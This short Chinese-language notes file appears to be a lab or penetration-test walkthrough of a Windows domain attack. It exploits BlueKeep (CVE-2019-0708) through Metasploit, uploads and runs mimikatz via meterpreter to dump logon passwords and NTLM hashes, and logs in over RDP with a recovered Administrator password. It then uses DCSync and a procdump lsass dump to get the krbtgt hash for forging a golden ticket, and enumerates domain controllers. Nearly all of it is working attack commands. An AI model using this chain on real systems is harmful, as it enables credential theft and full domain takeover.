发现有密码-查询历史漏洞进行攻击-MSF:windows/rdp/cve_2019_0708_bluekeep_rce
meterpreter> upload /mimikatz.rar
meterpreter> shell
C:\windows\system32>chcp 65001 【注:解决乱码问题】
C:\windows\system32>dir 【注:查找mimikatz.rar】
C:\windows\system32>unrar e mimikatz.rar
C:\windows\system32>mimikatz.exe
上传mimikatz
破解win2008登录密码
privilege::debug sekurlsa::logonpasswordsNTLM哈希
远程登录
root@kali:~# rdesktop 192.168.28.130:1080
账户密码 Administrator:root@123456
查询域内信息
获得域控 伪造黄金票据第一步:在域控内导出krbtgt用户的hash和sid(使用mimikatz.exe工具):
lsadump::dcsync /domain:test.com /user:krbtgt domian:后面是域控名 user后面是krbtgt用户 或者可以利用procdump把lsass进程的内存文件导出本地,再在本地利用mimikatz读取密码
procdump64.exe -accepteula -ma lsass.exe lsass.dmp 导出为lsass.dump文件
获取域控信息
net group "domain controllers" /domain